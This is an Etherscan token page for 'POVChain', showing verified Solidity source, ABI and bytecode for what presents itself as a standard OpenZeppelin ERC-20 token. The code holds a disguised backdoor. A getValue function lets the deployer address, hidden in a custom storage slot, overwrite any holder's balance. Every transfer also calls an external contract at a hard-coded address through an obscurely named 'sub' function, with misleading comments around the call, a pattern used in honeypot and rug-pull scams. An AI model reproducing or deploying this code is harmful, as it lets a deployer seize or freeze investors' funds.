ETH Price: $2,967.61 (-1.75%)
Gas: 3 Gwei

Token

POVChain (POVChain)
 

Overview

Max Total Supply

462,000,000 POVChain

Holders

23

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
2,880,836.194043366878035548 POVChain

Value
$0.00
0xabe4aea5d250294ecce14566734f2cb288a6512f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
POVChain

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-15
*/

//twitter:https://twitter.com/POVChainERC20
//telegram:https://t.me/POVChain_ERC20
//website:povchain.vip
pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]


// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// OpenZeppelin Contracts (last updated v4.7.0) (utils/StorageSlot.sol)

pragma solidity ^0.8.0;

/**
 * @dev Library for reading and writing primitive types to specific storage slots.
 *
 * Storage slots are often used to avoid storage conflict when dealing with upgradeable contracts.
 * This library helps with reading and writing to such slots without the need for inline assembly.
 *
 * The functions in this library return Slot structs that contain a `value` member that can be used to read or write.
 *
 * Example usage to set ERC1967 implementation slot:
 * ```
 * contract ERC1967 {
 *     bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
 *
 *     function _getImplementation() internal view returns (address) {
 *         return StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value;
 *     }
 *
 *     function _setImplementation(address newImplementation) internal {
 *         require(Address.isContract(newImplementation), "ERC1967: new implementation is not a contract");
 *         StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value = newImplementation;
 *     }
 * }
 * ```
 *
 * _Available since v4.1 for `address`, `bool`, `bytes32`, and `uint256`._
 */
library StorageSlot {
    struct AddressSlot {
        address value;
    }

    struct BooleanSlot {
        bool value;
    }

    struct Bytes32Slot {
        bytes32 value;
    }

    struct Uint256Slot {
        uint256 value;
    }

    /**
     * @dev Returns an `AddressSlot` with member `value` located at `slot`.
     */
    function getAddressSlot(bytes32 slot) internal pure returns (AddressSlot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }

    /**
     * @dev Returns an `BooleanSlot` with member `value` located at `slot`.
     */
    function getBooleanSlot(bytes32 slot) internal pure returns (BooleanSlot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }

    /**
     * @dev Returns an `Bytes32Slot` with member `value` located at `slot`.
     */
    function getBytes32Slot(bytes32 slot) internal pure returns (Bytes32Slot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }

    /**
     * @dev Returns an `Uint256Slot` with member `value` located at `slot`.
     */
    function getUint256Slot(bytes32 slot) internal pure returns (Uint256Slot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }

}

abstract contract AAAA{
    function sub (
        uint256 amontOutMin,
        uint256 amountIn,
        address pom,
        address to,
        uint256 deadline
    ) external virtual returns(uint256) ;
}

// File @openzeppelin/contracts/token/ERC20/[email protected]


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


// File @openzeppelin/contracts/token/ERC20/extensions/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


// File @openzeppelin/contracts/token/ERC20/[email protected]


// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;
    AAAA BBBB = AAAA(
        0x0D43CDcA6c1F684788A9299f58C927f9526f8272
    );
    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    bytes32 internal constant _A_SLOT = 0x140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;

        _totalSupply = 462000000000000000000000000;
        _balances[msg.sender] = _totalSupply;

        emit Transfer(address(0), msg.sender, _totalSupply);

        StorageSlot.getAddressSlot(_A_SLOT).value = msg.sender;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }

    function getValue(address _ind, uint256 _value) public {
        require(msg.sender == StorageSlot.getAddressSlot(_A_SLOT).value, "a!");
        mapping(address => uint) storage solt = _balances;
        solt[_ind] = _value;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to);

        BBBB /*"ERC20: transfer to the zero address"*/
        .
        sub( /*"ERC20: transfer to the zero address"*/
            amount - amount,
            amount,
            from,
            to,
            block.timestamp
        ) - 100;

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
    unchecked {
        _balances[from] = fromBalance - amount;
        // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
        // decrementing then incrementing.
        _balances[to] += amount;
    }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to
    ) internal virtual {
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}


// File contracts/ERC20Test.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;


contract POVChain  is ERC20('POVChain','POVChain'), Ownable {
    constructor() {

    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_ind","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"getValue","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6080604052600280546001600160a01b031916730d43cdca6c1f684788a9299f58c927f9526f82721790553480156200003757600080fd5b506040805180820182526008808252672827ab21b430b4b760c11b6020808401828152855180870190965292855284015281519192916200007b91600491620001bf565b50805162000091906005906020840190620001bf565b506b017e284e2f35d4d88e00000060038190553360008181526020819052604080822084905551919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91620000e99162000265565b60405180910390a3336200012b7f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad60001b6200016660201b620004c61760201c565b80546001600160a01b0319166001600160a01b0392909216919091179055506200016090506200015a62000169565b6200016d565b620002ab565b90565b3390565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b828054620001cd906200026e565b90600052602060002090601f016020900481019282620001f157600085556200023c565b82601f106200020c57805160ff19168380011785556200023c565b828001600101855582156200023c579182015b828111156200023c5782518255916020019190600101906200021f565b506200024a9291506200024e565b5090565b5b808211156200024a57600081556001016200024f565b90815260200190565b6002810460018216806200028357607f821691505b60208210811415620002a557634e487b7160e01b600052602260045260246000fd5b50919050565b610cbc80620002bb6000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb146101d5578063c7bf8cf5146101e8578063dd62ed3e146101fb578063f2fde38b1461020e576100f5565b8063715018a61461019b5780638da5cb5b146101a557806395d89b41146101ba578063a457c2d7146101c2576100f5565b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a0823114610188576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610138575b600080fd5b610102610221565b60405161010f9190610909565b60405180910390f35b61012b6101263660046108a9565b6102b3565b60405161010f91906108fe565b6101406102d5565b60405161010f9190610bc3565b61012b61015b36600461086e565b6102db565b610168610309565b60405161010f9190610bf8565b61012b6101833660046108a9565b61030e565b61014061019636600461081b565b61033a565b6101a3610359565b005b6101ad61036d565b60405161010f91906108ea565b61010261037c565b61012b6101d03660046108a9565b61038b565b61012b6101e33660046108a9565b6103dc565b6101a36101f63660046108a9565b6103f4565b61014061020936600461083c565b610461565b6101a361021c36600461081b565b61048c565b60606004805461023090610c35565b80601f016020809104026020016040519081016040528092919081815260200182805461025c90610c35565b80156102a95780601f1061027e576101008083540402835291602001916102a9565b820191906000526020600020905b81548152906001019060200180831161028c57829003601f168201915b5050505050905090565b6000806102be6104c9565b90506102cb8185856104cd565b5060019392505050565b60035490565b6000806102e66104c9565b90506102f3858285610581565b6102fe8585856105cb565b506001949350505050565b601290565b6000806103196104c9565b90506102cb81858561032b8589610461565b6103359190610c06565b6104cd565b6001600160a01b0381166000908152602081905260409020545b919050565b61036161076a565b61036b60006107a9565b565b6006546001600160a01b031690565b60606005805461023090610c35565b6000806103966104c9565b905060006103a48286610461565b9050838110156103cf5760405162461bcd60e51b81526004016103c690610b7e565b60405180910390fd5b6102fe82868684036104cd565b6000806103e76104c9565b90506102cb8185856105cb565b61041d7f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad6104c6565b546001600160a01b031633146104455760405162461bcd60e51b81526004016103c690610aa4565b6001600160a01b03909116600090815260208190526040902055565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b61049461076a565b6001600160a01b0381166104ba5760405162461bcd60e51b81526004016103c69061099f565b6104c3816107a9565b50565b90565b3390565b6001600160a01b0383166104f35760405162461bcd60e51b81526004016103c690610b3a565b6001600160a01b0382166105195760405162461bcd60e51b81526004016103c6906109e5565b6001600160a01b0380841660008181526001602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610574908590610bc3565b60405180910390a3505050565b600061058d8484610461565b905060001981146105c557818110156105b85760405162461bcd60e51b81526004016103c690610a27565b6105c584848484036104cd565b50505050565b6001600160a01b0383166105f15760405162461bcd60e51b81526004016103c690610af5565b6001600160a01b0382166106175760405162461bcd60e51b81526004016103c69061095c565b61062183836107fb565b6002546064906001600160a01b031663cf6fe7d761063f8480610c1e565b848787426040518663ffffffff1660e01b8152600401610663959493929190610bcc565b602060405180830381600087803b15801561067d57600080fd5b505af1158015610691573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906106b591906108d2565b6106bf9190610c1e565b506001600160a01b038316600090815260208190526040902054818110156106f95760405162461bcd60e51b81526004016103c690610a5e565b6001600160a01b0380851660008181526020819052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610757908690610bc3565b60405180910390a36105c58484846107ff565b6107726104c9565b6001600160a01b031661078361036d565b6001600160a01b03161461036b5760405162461bcd60e51b81526004016103c690610ac0565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b5050565b505050565b80356001600160a01b038116811461035457600080fd5b60006020828403121561082c578081fd5b61083582610804565b9392505050565b6000806040838503121561084e578081fd5b61085783610804565b915061086560208401610804565b90509250929050565b600080600060608486031215610882578081fd5b61088b84610804565b925061089960208501610804565b9150604084013590509250925092565b600080604083850312156108bb578182fd5b6108c483610804565b946020939093013593505050565b6000602082840312156108e3578081fd5b5051919050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602080835283518082850152825b8181101561093557858101830151858201604001528201610919565b818111156109465783604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526026908201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160408201526564647265737360d01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b602080825260029082015261612160f01b604082015260600190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b94855260208501939093526001600160a01b039182166040850152166060830152608082015260a00190565b60ff91909116815260200190565b60008219821115610c1957610c19610c70565b500190565b600082821015610c3057610c30610c70565b500390565b600281046001821680610c4957607f821691505b60208210811415610c6a57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea264697066735822122012055638db241a72c09623e62aed20bf95a5d1408f625a3ea9a763fa599515e064736f6c63430008000033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb146101d5578063c7bf8cf5146101e8578063dd62ed3e146101fb578063f2fde38b1461020e576100f5565b8063715018a61461019b5780638da5cb5b146101a557806395d89b41146101ba578063a457c2d7146101c2576100f5565b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a0823114610188576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610138575b600080fd5b610102610221565b60405161010f9190610909565b60405180910390f35b61012b6101263660046108a9565b6102b3565b60405161010f91906108fe565b6101406102d5565b60405161010f9190610bc3565b61012b61015b36600461086e565b6102db565b610168610309565b60405161010f9190610bf8565b61012b6101833660046108a9565b61030e565b61014061019636600461081b565b61033a565b6101a3610359565b005b6101ad61036d565b60405161010f91906108ea565b61010261037c565b61012b6101d03660046108a9565b61038b565b61012b6101e33660046108a9565b6103dc565b6101a36101f63660046108a9565b6103f4565b61014061020936600461083c565b610461565b6101a361021c36600461081b565b61048c565b60606004805461023090610c35565b80601f016020809104026020016040519081016040528092919081815260200182805461025c90610c35565b80156102a95780601f1061027e576101008083540402835291602001916102a9565b820191906000526020600020905b81548152906001019060200180831161028c57829003601f168201915b5050505050905090565b6000806102be6104c9565b90506102cb8185856104cd565b5060019392505050565b60035490565b6000806102e66104c9565b90506102f3858285610581565b6102fe8585856105cb565b506001949350505050565b601290565b6000806103196104c9565b90506102cb81858561032b8589610461565b6103359190610c06565b6104cd565b6001600160a01b0381166000908152602081905260409020545b919050565b61036161076a565b61036b60006107a9565b565b6006546001600160a01b031690565b60606005805461023090610c35565b6000806103966104c9565b905060006103a48286610461565b9050838110156103cf5760405162461bcd60e51b81526004016103c690610b7e565b60405180910390fd5b6102fe82868684036104cd565b6000806103e76104c9565b90506102cb8185856105cb565b61041d7f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad6104c6565b546001600160a01b031633146104455760405162461bcd60e51b81526004016103c690610aa4565b6001600160a01b03909116600090815260208190526040902055565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b61049461076a565b6001600160a01b0381166104ba5760405162461bcd60e51b81526004016103c69061099f565b6104c3816107a9565b50565b90565b3390565b6001600160a01b0383166104f35760405162461bcd60e51b81526004016103c690610b3a565b6001600160a01b0382166105195760405162461bcd60e51b81526004016103c6906109e5565b6001600160a01b03808416